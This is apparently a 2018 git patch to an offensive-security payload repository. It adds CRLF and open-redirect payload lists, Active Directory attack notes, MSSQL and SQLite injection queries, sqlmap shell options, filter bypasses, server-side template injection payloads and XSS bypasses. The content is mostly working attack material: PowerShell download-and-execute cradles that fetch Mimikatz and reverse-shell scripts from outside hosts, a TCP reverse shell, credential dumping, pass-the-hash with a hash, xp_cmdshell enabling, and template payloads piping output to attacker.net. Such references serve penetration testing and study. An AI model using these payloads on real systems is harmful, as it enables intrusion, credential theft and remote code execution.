From 30019235f89038a18d7b0d6c7f5e6163e9ee89f2 Mon Sep 17 00:00:00 2001
From: Swissky
Date: Mon, 12 Mar 2018 09:17:31 +0100
Subject: [PATCH] SQLmap tips + Active Directory attacks + SQLite injections
---
 CRLF injection/crlfinjection.txt | 17 +++
 .../Active Directory Attack.md | 88 ++++++++++++++
 ...atsheet.md => Reverse Shell Cheatsheet.md} | 13 +++
 .../Windows - Using credentials.md | 14 ++-
 Open redirect/openredirects.txt | 67 +++++++++++
 Remote commands execution/README.md | 23 ++++
 SQL injection/MSSQL Injection.md | 80 +++++++++++++
 SQL injection/README.md | 18 +++
 SQL injection/SQLite Injection.md | 10 +-
 SSRF injection/README.md | 9 ++
 Server Side Template injections/README.md | 110 +++++++++++++++---
 XSS injection/Files/XML XSS.xml | 14 ++-
 XSS injection/README.md | 54 ++++++++-
 13 files changed, 492 insertions(+), 25 deletions(-)
 create mode 100644 CRLF injection/crlfinjection.txt
 create mode 100644 Methodology and Resources/Active Directory Attack.md
 rename Methodology and Resources/{Linux - Reverse Shell Cheatsheet.md => Reverse Shell Cheatsheet.md} (88%)
 create mode 100644 Open redirect/openredirects.txt
 create mode 100644 SQL injection/MSSQL Injection.md
diff --git a/CRLF injection/crlfinjection.txt b/CRLF injection/crlfinjection.txt
new file mode 100644
index 0000000..d7ef4d7
--- /dev/null
+++ b/CRLF injection/crlfinjection.txt
@@ -0,0 +1,17 @@
+/%%0a0aSet-Cookie:crlf=injection
+/%0aSet-Cookie:crlf=injection
+/%0d%0aSet-Cookie:crlf=injection
+/%0dSet-Cookie:crlf=injection
+/%23%0aSet-Cookie:crlf=injection
+/%23%0d%0aSet-Cookie:crlf=injection
+/%23%0dSet-Cookie:crlf=injection
+/%25%30%61Set-Cookie:crlf=injection
+/%25%30aSet-Cookie:crlf=injection
+/%250aSet-Cookie:crlf=injection
+/%25250aSet-Cookie:crlf=injection
+/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
+/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
+/%2F..%0d%0aSet-Cookie:crlf=injection
+/%3f%0d%0aSet-Cookie:crlf=injection
+/%3f%0dSet-Cookie:crlf=injection
+/%u000aSet-Cookie:crlf=injection
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
new file mode 100644
index 0000000..0609fb3
--- /dev/null
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -0,0 +1,88 @@
+# Active Directory Attacks
+
+## Most common paths to AD compromise
+ * MS14-068
+ * MS17-010 (Eternal Blue - Local Admin)
+ ```c
+ nmap -Pn -p445 — open — max-hostgroup 3 — script smb-vuln-ms17–010
+ ```
+ * Unconstrained Delegation (incl. pass-the-ticket)
+ * OverPass-the-Hash (Making the most of NTLM password hashes)
+ * Pivoting with Local Admin & Passwords in SYSVOL
+ * Dangerous Built-in Groups Usage
+ * Dumping AD Domain Credentials
+ * Golden Tickets
+ * Kerberoast
+ * Silver Tickets
+ * Trust Tickets
+
+
+## Tools
+ * [Impacket](https://github.com/CoreSecurity/impacket)
+ * Responder
+ * Mimikatz
+ * [Ranger](https://github.com/funkandwagnalls/ranger)
+ * BloodHound
+ * RottenPotato
+
+## Mimikatz
+```
+load mimikatz
+mimikatz_command -f sekurlsa::logonPasswords full
+```
+
+## PowerSploit
+```
+https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
+powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks”
+powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
+```
+
+
+## PrivEsc - Token Impersonation (RottenPotato)
+Binary available at : https://github.com/foxglovesec/RottenPotato
+Binary available at : https://github.com/breenmachine/RottenPotatoNG
+```c
+getuid
+getprivs
+use incognito
+list\_tokens -u
+cd c:\temp\
+execute -Hc -f ./rot.exe
+impersonate\_token "NT AUTHORITY\SYSTEM"
+```
+
+```
+Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
+Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
+Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
+```
+
+## PrivEsc - MS14-068
+```
+Exploit Python : https://www.exploit-db.com/exploits/35474/
+
+Doc: 
https://github.com/gentilkiwi/kekeo/wiki/ms14068
+```
+
+## PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
+```
+Powershell:
+https://www.exploit-db.com/exploits/39719/
+https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
+
+Binary exe : https://github.com/Meatballs1/ms16-032
+
+Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
+```
+
+## Kerberoast
+```
+https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
+https://room362.com/post/2016/kerberoast-pt1/
+```
+
+## Thanks to
+ * [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
+ * [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
+ * [Road to DC](https://steemit.com/infosec/@austinhudson/road-to-dc-part-1)
diff --git a/Methodology and Resources/Linux - Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
similarity index 88%
rename from Methodology and Resources/Linux - Reverse Shell Cheatsheet.md
rename to Methodology and Resources/Reverse Shell Cheatsheet.md
index 78769a3..4086813 100644
--- a/Methodology and Resources/Linux - Reverse Shell Cheatsheet.md
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -72,6 +72,10 @@ Powershell
 powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 ```
+```powershell
+powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
+```
+
 Java
 ```java
 r = Runtime.getRuntime()
@@ -109,6 +113,14 @@ ruby: exec "/bin/sh"
 lua: os.execute('/bin/sh')
 ```
+Access shortcuts, su, nano and autocomplete in a partially tty shell
+```
+ctrl+z
+stty raw -echo
+fg
+```
+/!\ OhMyZSH might break this trick
+
 (From within vi)
 ```
 :!bash
@@ -124,3 +136,4 @@ lua: os.execute('/bin/sh')
 * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
 * [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
 * [Spawning a TTY Shell](http://netsec.ws/?p=337)
+* [Obtaining a fully interactive shell](https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell)
diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md
index 3e1850b..af66ffd 100644
--- a/Methodology and Resources/Windows - Using credentials.md
+++ b/Methodology and Resources/Windows - Using credentials.md
@@ -12,6 +12,7 @@ creds
 ```
 ## Metasploit - Psexec
+Note: the password can be replaced by a hash to execute a `pass the hash` attack.
 ```c
 use exploit/windows/smb/psexec
 set RHOST 10.2.0.3
@@ -29,6 +30,11 @@ python crackmapexec.py 10.9.122.0/25 -d CSCOU -u jarrieta -p nastyCutt3r
 python crackmapexec.py 10.9.122.5 -d CSCOU -u jarrieta -p nastyCutt3r -x whoami
 ```
+## Crackmapexec (Pass The Hash)
+```
+cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth
+```
+
 ## Winexe (Integrated to Kali)
 ```python
 winexe -U CSCOU/jarrieta%nastyCutt3r //10.9.122.5 cmd.exe
@@ -51,6 +57,10 @@ Note: you may need to enable it with the following command
 ```
 reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f
 ```
+or with psexec(sysinternals)
+```
+psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
+```
 ## Netuse (Windows)
 ```
@@ -69,6 +79,8 @@ PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe
 PsExec.exe \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s # get System shell
 ```
+
 ## Thanks
 - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
-- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
+ - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)
+ - [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html)
diff --git a/Open redirect/openredirects.txt b/Open redirect/openredirects.txt
new file mode 100644
index 0000000..c85c636
--- /dev/null
+++ b/Open redirect/openredirects.txt
@@ -0,0 +1,67 @@
+/%09/example.com
+/%2f%2fexample.com
+/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
+/%5cexample.com
+/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
+/.example.com
+//%09/example.com
+//%5cexample.com
+///%09/example.com
+///%5cexample.com
+////%09/example.com
+////%5cexample.com
+/////example.com
+/////example.com/
+////\;@example.com
+////example.com/
+////example.com/%2e%2e
+////example.com/%2e%2e%2f
+////example.com/%2f%2e%2e
+////example.com/%2f..
+////example.com//
+///\;@example.com
+///example.com
+///example.com/
+///example.com/%2e%2e
+///example.com/%2e%2e%2f
+///example.com/%2f%2e%2e
+///example.com/%2f..
+///example.com//
+//example.com
+//example.com/
+//example.com/%2e%2e
+//example.com/%2e%2e%2f
+//example.com/%2f%2e%2e
+//example.com/%2f..
+//example.com//
+//google%00.com
+//google%E3%80%82com
+//https:///example.com/%2e%2e
+//https://example.com/%2e%2e%2f
+//https://example.com//
+/<>//example.com
+/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
+/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com
+/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
+/\/\/example.com/
+/\/example.com/
+/example.com/%2f%2e%2e
+/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
+/http://example.com
+/http:/example.com
+/https:/%5cexample.com/
+/https://%09/example.com
+/https://%5cexample.com
+/https:///example.com/%2e%2e
+/https:///example.com/%2f%2e%2e
+/https://example.com
+/https://example.com/
+/https://example.com/%2e%2e
+/https://example.com/%2e%2e%2f
+/https://example.com/%2f%2e%2e
+/https://example.com/%2f..
+/https://example.com//
+/https:example.com
+/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
+/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com
+/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md
index 3ffd7b1..5209dc6 100644
--- a/Remote commands execution/README.md
+++ b/Remote commands execution/README.md
@@ -67,6 +67,29 @@ Commands execution with a line return
 something%0Acat%20/etc/passwd
 ```
+Bypass blacklisted word with single quote
+```
+w'h'o'am'i
+```
+
+Bypass blacklisted word with double quote
+```
+w"h"o"am"i
+```
+
+Bypass blacklisted word with $@
+```
+who$@ami
+```
+
+Bypass zsh/bash/sh blacklist
+```
+echo $0
+-> /usr/bin/zsh
+echo whoami|$0
+```
+
+
 ## Time based data exfiltration
 Extracting data : char by char
 ```
diff --git a/SQL injection/MSSQL Injection.md b/SQL injection/MSSQL Injection.md
new file mode 100644
index 0000000..91fe273
--- /dev/null
+++ b/SQL injection/MSSQL Injection.md
@@ -0,0 +1,80 @@
+# MSSQL Injection
+
+## MSSQL version
+```
+SELECT @@version
+```
+
+## MSSQL database name
+```
+SELECT DB_NAME()
+```
+
+## MSSQL List Databases
+```
+SELECT name FROM master..sysdatabases;
+SELECT DB_NAME(N); — for N = 0, 1, 2, …
+```
+
+## MSSQL List Column
+```
+SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
+SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
+```
+
+## MSSQL List Tables
+```
+SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
+SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
+SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable
+```
+
+
+## MSSQL User Password
+```
+MSSQL 2000:
+SELECT name, password FROM master..sysxlogins
+SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
+
+MSSQL 2005
+SELECT name, password_hash FROM master.sys.sql_logins
+SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
+```
+
+## MSSQL Error based
+```
+For integer inputs : convert(int,@@version)
+For string inputs : ' + convert(int,@@version) + '
+```
+
+## MSSQL Time based
+```
+ProductID=1;waitfor delay '0:0:10'--
+ProductID=1);waitfor delay '0:0:10'--
+ProductID=1';waitfor delay '0:0:10'--
+ProductID=1');waitfor delay '0:0:10'--
+ProductID=1));waitfor delay '0:0:10'--
+```
+
+## MSSQL Command execution
+```
+EXEC xp_cmdshell "net user";
+EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
+EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'
+```
+If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)
+```
+EXEC sp_configure 'show advanced options',1
+RECONFIGURE
+EXEC sp_configure 'xp_cmdshell',1
+RECONFIGURE
+```
+
+## MSSQL Make user DBA (DB admin)
+```
+EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
+```
+
+## Thanks to
+ * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
+ * [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
diff --git a/SQL injection/README.md b/SQL injection/README.md
index 4080da4..1af69f8 100644
--- a/SQL injection/README.md
+++ b/SQL injection/README.md
@@ -43,6 +43,22 @@ python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wis
 sqlmap -r 1.txt -dbms MySQL -second-order "http:///joomla/administrator/index.php" -D "joomla" -dbs
 ```
+Shell
+```
+SQL Shell
+python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell
+
+Simple Shell
+python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
+
+Dropping a reverse-shell / meterpreter
+python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
+```
+
+Using suffix to tamper the injection
+```
+python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
+```
 General tamper option and tamper's list
 ```
@@ -338,3 +354,5 @@ mysql> mysql> select version();
 * Second Order:
 - [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection](https://www.notsosecure.com/analyzing-cve-2018-6376/)
 - [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
+* Sqlmap:
+ - [#SQLmap protip @zh4ck](https://twitter.com/zh4ck/status/972441560875970560)
diff --git a/SQL injection/SQLite Injection.md b/SQL injection/SQLite Injection.md
index 06f88e6..6285dc1 100644
--- a/SQL injection/SQLite Injection.md
+++ b/SQL injection/SQLite Injection.md
@@ -1,5 +1,9 @@
 # SQLite Injection
+## SQLite version
+```
+select sqlite_version();
+```
 ## Integer/String based - Extract table name
 ```
@@ -34,9 +38,9 @@ and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and
 ## Remote Command Execution using SQLite command - Attach Database
 ```
-ATTACH DATABASE ‘/var/www/lol.php’ AS lol;
+ATTACH DATABASE '/var/www/lol.php' AS lol;
 CREATE TABLE lol.pwn (dataz text);
-INSERT INTO lol.pwn (dataz) VALUES (‘’);--
+INSERT INTO lol.pwn (dataz) VALUES ('');--
 ```
 ## Remote Command Execution using SQLite command - Load_extension
@@ -46,4 +50,4 @@ UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');
 Note: By default this component is disabled
 ## Thanks to
-[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)
\ No newline at end of file
+[Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/41397.pdf)
diff --git a/SSRF injection/README.md b/SSRF injection/README.md
index 471f98d..325c258 100644
--- a/SSRF injection/README.md
+++ b/SSRF injection/README.md
@@ -90,6 +90,13 @@ Bypass using rare address
 http://0/
 ```
+Bypass using bash variables (curl only)
+```
+curl -v "http://evil$google.com"
+
+$google = ""
+```
+
 Bypass using tricks combination
 ```
 http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
@@ -108,6 +115,7 @@ List:
 ## SSRF via URL Scheme
+
 Dict://
 The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
 ```
@@ -230,3 +238,4 @@ http://0251.00376.000251.0000376/ Dotted octal with padding
 * [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
 * [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)
 * [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)
+* [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md
index 639974b..b04d559 100644
--- a/Server Side Template injections/README.md
+++ b/Server Side Template injections/README.md
@@ -1,47 +1,127 @@
 # Templates Injections
-Template injection allows an attacker to include template code into an existant (or not) template.
+> Template injection allows an attacker to include template code into an existant (or not) template.
+
+Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
+e.g:
+```
+./tplmap.py --os-shell -u 'http://www.target.com/page?name=John'
+```
+
 ## Ruby
-#### Basic injection
+### Basic injection
 ```python
 <%= 7 * 7 %>
 ```
-#### Retrieve /etc/passwd
+### Retrieve /etc/passwd
 ```python
 <%= File.open('/etc/passwd').read %>
 ```
 ## Java
-#### Basic injection
+### Basic injection
 ```java
 ${{7*7}}
 ```
-#### Retrieve the system’s environment variables.
+### Retrieve the system’s environment variables.
 ```java
 ${T(java.lang.System).getenv()}
 ```
-#### Retrieve /etc/passwd
+### Retrieve /etc/passwd
 ```java
 ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
 ```
+## Twig
+### Basic injection
+```python
+{{7*7}}
+{{7*'7'}} would result in 49
+```
+
+### Template format
+```python
+$output = $twig > render (
+ 'Dear' . 
$_GET['custom_greeting'],
+ array("first_name" => $user.first_name)
+);
+
+$output = $twig > render (
+ "Dear {first_name}",
+ array("first_name" => $user.first_name)
+);
+```
+
+### Code execution
+```python
+{{self}}
+{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
+{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
+```
+
+
+## Smarty
+```python
+{php}echo `id`;{/php}
+{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())}
+```
+
+## Freemarker
+Default functionality.
+```python
+<#assign +ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
+```
+
+## Jade / Codepen
+```python
+- var x = root.process
+- x = x.mainModule.require
+- x = x('child_process')
+= x.exec('id | nc attacker.net 80')
+```
+
+## Velocity
+```python
+#set($str=$class.inspect("java.lang.String").type)
+#set($chr=$class.inspect("java.lang.Character").type)
+#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
+$ex.waitFor()
+#set($out=$ex.getInputStream())
+#foreach($i in [1..$out.available()])
+$str.valueOf($chr.toChars($out.read()))
+#end
+```
+
+## Mako
+```python
+<%
+import os
+x=os.popen('id').read()
+%>
+${x}
+```
+
+
 ## Jinja2
 [Official website](http://jinja.pocoo.org/)
 > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
-#### Basic injection
+
+### Basic injection
 ```python
 {{4*4}}[[5*5]]
+{{7*'7'}} would result in 7777777
 ```
 Jinja2 is used by Python Web Frameworks such as Django or Flask.
 The above injections have been tested on Flask application.
-#### Template format
+### Template format
 ```python
 {% extends "layout.html" %}
 {% block body %}
@@ -54,12 +134,12 @@ The above injections have been tested on Flask application. ``` -#### Dump all used classes +### Dump all used classes ```python {{ ''.__class__.__mro__[2].__subclasses__() }} ``` -#### Dump all config variables +### Dump all config variables ```python {% for key, value in config.iteritems() %}
{{ key|e }}
@@ -67,18 +147,18 @@ The above injections have been tested on Flask application. {% endfor %} ``` -#### Read remote file +### Read remote file ```python # ''.__class__.__mro__[2].__subclasses__()[40] = File class {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} ``` -#### Write into remote file +### Write into remote file ```python {{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }} ``` -#### Remote Code Execution via reverse shell +### Remote Code Execution via reverse shell Listen for connexion ``` nv -lnvp 8000 @@ -94,5 +174,5 @@ Inject this template * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) * [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/) * [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/) -#### Training -[https://w3challs.com/](https://w3challs.com/) + * [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98) + * [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf) diff --git a/XSS injection/Files/XML XSS.xml b/XSS injection/Files/XML XSS.xml index e7a6635..050b157 100644 --- a/XSS injection/Files/XML XSS.xml +++ b/XSS injection/Files/XML XSS.xml @@ -2,5 +2,17 @@ alert(1) + + + + confirm(document.domain)]]> + + + Hello + + + http://google.com + + - \ No newline at end of file + diff --git a/XSS injection/README.md b/XSS injection/README.md index 48a3690..a4fd0b6 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md 
@@ -71,6 +71,12 @@ XSS for HTML5
 ```
+XSS using script tag (external payload)
+```
+]]> + +``` + + +XSS in XML ```
@@ -432,6 +446,17 @@ Bypass case sensitive
 ```
+Bypass tag blacklist
+```
+"; ``` + Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040)
 ```
 window['alert'](0)
@@ -566,6 +588,22 @@ Bypass ';' using another character
 'te' instanceof alert('instanceof') instanceof 'xt';
 ```
+Bypass using HTML encoding
+```
+%26%2397;lert(1)
+```
+
+Bypass using Katakana (https://github.com/aemkei/katakana.js)
+```
+javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
+```
+
+Bypass using Octal encoding
+```
+javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
+```
+
+
 Bypass using Unicode
 ```
 Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was
@@ -672,6 +710,12 @@ Exotic payloads